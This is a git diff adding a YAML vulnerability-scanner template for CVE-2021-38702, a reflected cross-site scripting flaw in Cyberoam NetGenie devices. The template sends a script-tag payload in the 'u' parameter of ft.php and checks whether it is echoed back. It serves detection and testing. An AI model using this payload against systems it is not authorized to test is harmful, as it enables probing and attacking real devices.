diff --git a/cves/2021/CVE-2021-38702.yaml b/cves/2021/CVE-2021-38702.yaml
new file mode 100644
index 0000000000..a662c79f19
--- /dev/null
+++ b/cves/2021/CVE-2021-38702.yaml
@@ -0,0 +1,24 @@
+id: CVE-2021-38702
+
+info:
+  name: Cyberoam NetGenie XSS
+  description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 allow for reflected Cross Site Scripting via the 'u' parameter of ft.php.
+  reference: https://seclists.org/fulldisclosure/2021/Aug/20
+  author: geeknik
+  severity: medium
+  tags: cve,cve2021,cyberoam,netgenie,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/tweb/ft.php?u=<script>confirm(\"{{randstr}}\")</script>"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<script>confirm(\"{{randstr}}\")</script>"
+      - type: word
+        words:
+          - "text/html"
+        part: header